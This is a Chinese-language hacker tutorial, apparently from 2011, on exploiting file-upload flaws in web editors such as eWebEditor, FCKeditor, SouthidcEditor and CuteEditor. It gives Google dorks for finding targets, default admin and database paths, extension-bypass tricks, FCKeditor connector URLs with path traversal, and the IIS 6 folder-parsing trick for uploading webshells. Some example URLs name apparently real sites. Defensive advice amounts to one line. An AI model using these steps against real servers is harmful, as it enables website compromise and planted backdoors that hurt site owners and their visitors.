2011編輯器漏洞總結(jié)

如何搜索編輯器漏洞？
site:editor inurl:asp?id inurl:ewebeditornet
比如常見的編輯器漏洞有:
ewebeditor
ewebeditornet
fckeditor
editor
southidceditor
SouthidcEditor
bigcneditor
CuteEditor
一:ewebeditor為例
1:默認(rèn)下載下來的后臺:
http://www.test.com/ewebeditor/admin_login.asp
后臺如果能進入:
可點擊樣式管理:
standard 拷貝一份(直接修改改不了)
在拷貝的一份里加入圖片類型( asa aaspsp ) 然后點預(yù)覽
在編輯器里點設(shè)計 然后直接上傳asa大馬.
上傳后 在代碼里可以看到馬的位置!
(原理:因為在iis里 網(wǎng)站的屬性里 應(yīng)用程序配置一項 asa擴展名還是用asp.dll來解析的,asp也是 還有 cer cdx )
在cer cdx asa的被刪掉 那么馬兒就找不到 映射不過去.
可以在拷貝過后的樣式 圖片類型里加入 aaspsp 然后在上傳 直接就可以上傳asp文件
2:下載默認(rèn)數(shù)據(jù)庫
www.test.com/ewebeditor/db/ewebeditor.mdb
然后分析數(shù)據(jù)庫
webeditor_system(1) 就可以看到用戶名和密碼 如果破解不出來
可以在webeditor_style(14 樣式表里
主要看允許上傳文件的擴展名(s-fileext s_ingeext)
看到一個小黑客曾經(jīng)搞過 多了asa aaspsp
可以用他來利用!(后臺找不到的情況下也可以用此方法)
可以構(gòu)造語句:
比如 ID=46 s-name =standard1
構(gòu)造 代碼: ewebeditor.asp?id=content&style=standard
ID和和樣式名改過后
ewebeditor.asp?id=46&style=standard1
然后就是進入編輯器 上傳asa 或者asp的 得到webshell
二:ewebeditornet 漏洞利用
默認(rèn)上傳地址:
www.test.com/ewebeditornet/upload.aspx
可以直接上傳一個cer的木馬
在無法上傳的情況下
可以地址欄構(gòu)造以下代碼: javascript:lbtnUpload.click();
然后查看源代碼:
找到uploadsave 找到地址
默認(rèn)傳到uploadfile這個文件夾里
(漏洞修補: 可以在iss里直接把upload文件夾的執(zhí)行權(quán)限選擇無. )
三:fckeditor 漏洞利用
http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/
就把文件名字段改成NEWfile 選擇文件名可定義
上傳過后在/userfiles/image/找文件
四：southidceditor
http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb
http://www.xhkjit.com/admin/southidceditor/popup.asp
http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp
五：bigcneditor
這個頁不多說了
原理都差不多！
防范方法很簡單就不多講了，
FCKeditor上傳漏洞,
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打開這個地址就可以上傳任何類型的文件了，馬兒上傳到的位置是:
http://www.xxx.com/UserFiles/all/1.asa
"Type=all" 這個變量是自己定義的,在這里創(chuàng)建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.
比如輸入:
http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp
所傳的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了
而 如果這樣輸入:http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser /default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以傳到網(wǎng)站的根目錄下,網(wǎng)站支持什么腳本,傳什么腳本的馬就可以了.
所傳的文件就到了網(wǎng)站根目錄下了
http://www.borse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=457&messageID=532&ListType=FromForum&FromCurrentPage=1&time=1219282232781
六：CuteEditor編輯器通殺漏洞
CuteEditor編輯器是.NET下最常用的一個編輯器..
十分的強大..也許是因為他太強了 HEHE ..
我們隨便找到一個裝有此編輯器的網(wǎng)站 點擊插入圖片 FLASH 影音文件 什么的都可以出來一個對話框.
在這個對話框里可以游覽用戶所上傳的數(shù)據(jù)還有目錄..郁悶的是居然可以新建..移動..修改..
在官網(wǎng)上甚至連刪除都弄出來了..呵呵.. 我們這次主要是利用2003服務(wù)器的特性來進行利用..
大家都知道在2003的IIS環(huán)境下 如果你建一個 XXX.asp 文件夾的話 里面不管放什么其他類型的文件
在IIS里都會通過文件夾名的類型來解析 也就是說你傳一個JPG的東西到 XXX.ASP下也會以ASP腳本
來進行解析..我們這里就利用他這一特性...首先我們隨便找一個編輯器 然后選擇插入圖片吧(如圖1)..插入其他的
東西都行..只要能新建文件目錄..或者可以移動目錄..
看這里就有新建文件夾等等一些操作的按鈕我們新建一個..如果新建不能用可以試試移動文件夾把以有的文件夾名改成 XXX.asp形式..
好了.我們新建一個 www.asp 文件夾.
確定..我們的文件夾就建好了..然后點擊進入該文件夾 (
然后到了最關(guān)鍵的...我們上傳文件..
用插入圖片是上傳不了的..他會檢測是不是正常的圖片..
可以試試 插入 FLASH
或者插入 視頻 音樂文件..我們這里就插入視頻.. 然后直接把 我們要傳上去的馬后綴改為 .avi形式
然后進入我們剛才新建的那個目錄 然后上傳 .. 文件就上去了